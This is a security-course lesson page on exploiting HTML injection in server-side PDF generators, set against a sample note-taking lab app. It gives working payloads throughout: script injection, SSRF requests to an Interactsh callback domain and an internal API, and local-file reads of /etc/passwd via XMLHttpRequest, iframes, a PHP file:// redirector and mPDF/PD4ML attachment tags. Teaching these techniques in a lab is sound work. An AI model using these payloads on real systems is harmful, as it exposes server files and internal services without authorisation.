Injection Attacks  

Exploitation of PDF Generation Vulnerabilities


After discussing how and why web applications use PDF generation libraries, let us discuss how to exploit the vulnerabilities that arise in them and the misconfigurations that cause these vulnerabilities. All of these vulnerabilities require that user-provided content is inserted into the HTML input of the PDF generator.


JavaScript Code Execution

The first exploit we will explore is the injection of JavaScript code, since the execution of injected JavaScript code enables further attack vectors. Because the PDF generation library renders HTML input, it might execute our injected JavaScript code. Furthermore, with the PDF generation library running on the server, the payload would also be executed on the server, which is why this type of vulnerability is also called Server-Side XSS.

To demonstrate Server-Side XSS, let us take a look at a sample note-taking web application:

By clicking on the printer icon, the web application generates a printable PDF containing all our notes:

image

Since all the attack requires is the ability to inject HTML code, we will test whether the PDF generation library interprets the HTML code we provide. First, we will create a new note with a simple bold tag that contains our HTML payload:

Since the web application correctly escapes the HTML payload, the text between the tags has not become bold. Thus, the web application is secure against classical XSS attacks. However, if we generate a PDF, we can see that the text between the tags has become bold in the note's body, indicating that the PDF generation library is vulnerable to HTML injection and potentially Server-Side XSS:

image

In the second step, we need to verify whether the server executes injected JavaScript code. We can use a payload similar to the following:

<script>document.write('test1')</script>

After generating a PDF, we can see the string test1 in the PDF. Thus, the backend executed our injected JavaScript code and wrote the string to the DOM before generating the PDF.

image

As a simple first exploit, let us force an information disclosure that leaks a path on the web server. We can do so with the following payload:

<script>document.write(window.location)</script>

The window.location property stores the current location of the JavaScript context. Since this is a local file on the server's filesystem, it displays the local path on the server where generated PDF files are stored:

image

The execution of JavaScript can lead to further and more severe vulnerabilities, which we will discuss in the following sub-sections.


Server-Side Request Forgery

One of the most common vulnerabilities in combination with PDF generation is Server-Side Request Forgery (SSRF). Since HTML documents commonly load resources such as stylesheets or images from external sources, displaying an HTML document inherently requires the server to send requests to these external sources to fetch them. Since we can inject arbitrary HTML code into the PDF generator's input, we can force the server to send such a GET request to any URL we choose, including internal web applications.

We can inject many different HTML tags to force the server to send an HTTP request. For instance, we can inject an image tag pointing to a URL under our control to confirm SSRF. As an example, we are going to use the img tag with a domain from Interactsh:

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>

Similarly, we can also inject a stylesheet using the link tag:

<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2" >

Generally, for images and stylesheets, the response is not displayed in the generated PDF such that we have a blind SSRF vulnerability which restricts our ability to exploit it. However, depending on the (mis-)configuration of the PDF generation library, we can inject other HTML elements that can trigger a request and make the server display the response. An example of this is an iframe:

<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Injecting the three payloads and generating a PDF results in three requests to our Interactsh domains, such that we successfully confirmed SSRF with all three payloads:

Furthermore, looking at the generated PDF, we can see that the injected iframe contains the HTTP response sent by Interactsh:

image

Thus, we do not have a blind SSRF vulnerability but a regular SSRF, which is significantly more severe as it allows us to exfiltrate data more easily. For instance, we can make a request to any internal endpoint, and get the response displayed to us. As an example, we can leak data from an internal API like so:

<iframe src="http://127.0.0.1:8080/api/users" width="800" height="500"></iframe>

The generated PDF contains the response from the internal API, potentially revealing sensitive information to us that we are unable to access externally:

image

For more details on SSRF exploitation, check out the Server-side Attacks module.


Local File Inclusion

Another powerful vulnerability we can potentially exploit with the help of PDF generation libraries is Local File Inclusion (LFI). There are multiple HTML elements we can try to inject to read local files on the server.

With JavaScript Execution

If the server executes our injected JavaScript, we can read local files using XmlHttpRequests and the file protocol, resulting in a payload similar to the following:

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Injecting this JavaScript code, we can see the content of the passwd file in the generated PDF:

image

However, this is impractical for some files since copying data out of the PDF file might break it. For instance, the syntax most likely breaks if we exfiltrate an SSH key. Additionally, we cannot exfiltrate files containing binary data this way. Thus, we should base64-encode the file using the btoa function before writing it to the PDF:

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(btoa(this.responseText))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

However, doing so creates a single long line that does not fit onto the PDF page. Typically, the PDF generation library will not inject linebreaks, resulting in the line being truncated before the end of the page:

image

We can easily modify our payload to inject linebreaks every 100 characters to ensure that it fits on the PDF page:

<script>
	function addNewlines(str) {
		var result = '';
		while (str.length > 0) {
		    result += str.substring(0, 100) + '\n';
			str = str.substring(100);
		}
		return result;
	}

	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(addNewlines(btoa(this.responseText)))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

After doing so, we can finally retrieve the file without issues. We can now copy the base64-encoded data and decode it using any tool that ignores the linebreaks in the base64-encoded input, such as CyberChef:

image

Without JavaScript Execution

If the backend does not execute our injected JavaScript code, we must use other HTML tags to display local files. We can try the following payloads:

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

However, doing so in our test environment only displays an empty iframe:

image

Fortunately, there is one more trick we can do in combination with iframes. As discussed previously in the SSRF section, some PDF generation libraries display the response to requests in iframes. However, as we can see in the screenshot above, sometimes, we cannot use iframes to access files directly. Nevertheless, we can use an src attribute that points to a server under our control and redirects incoming requests to a local file. If the library is misconfigured, it may then display the file. We can run the following PHP script on our server to do so. The script responds to all incoming requests with an HTTP 302 redirect by setting the Location header to a local file using the file protocol:

<?php header('Location: file://' . $_GET['url']); ?>

We can then inject the following payload, where the IP points to the server we are running the redirector script on:

<iframe src="http://172.17.0.1:8000/redirector.php?url=%2fetc%2fpasswd" width="800" height="500"></iframe>

After doing so, the generated PDF now contains the leaked file:

image

For more details on LFI exploitation, check out the File Inclusion module.

Annotations

While we have already discussed how to include local files in the PDF pages, PDF files support advanced features like annotations and attachments, which we can also use to leak local files on the server. This is particularly interesting if the previously discussed payloads do not work.

For example, consider the PDF generation library mPDF, which supports annotations via the <annotations> tag. We can use annotations to append files to the generated PDF file by injecting a payload like the following:

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />

Looking at the generated PDF file, we can see the annotation with the attached file. Clicking on the attachment reveals the attached /etc/passwd file:

image

As we can see in this GitHub Issue, annotations have been disabled after mPDF 6.0. Thus, web applications using an outdated version of mPDF are most likely vulnerable to this. The option can still be enabled in newer versions of mPDF. Thus it is also worth testing web applications using up-to-date mPDF versions.

Another PDF generation library that supports attachments is PD4ML. We can check the syntax in the documentation. As a proof-of-concept, we can use the following payload:

<pd4ml:attachment src="/etc/passwd" description="LFI" icon="Paperclip"/>

Again, if we look at the generated PDF file, we can see the annotation with the attached file:

image

Like before, the file is revealed if we click on the annotation. As we can see, it is essential to read the documentation of the specific PDF generation library used by our target web application to see if we can identify any functionality we can potentially exploit. Custom tags like pd4ml:attachment that enable access to local files are particularly interesting.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Click here to spawn the target system!

Target: Click here to spawn the target system!

+10 Streak pts

Previous

+10 Streak pts

Next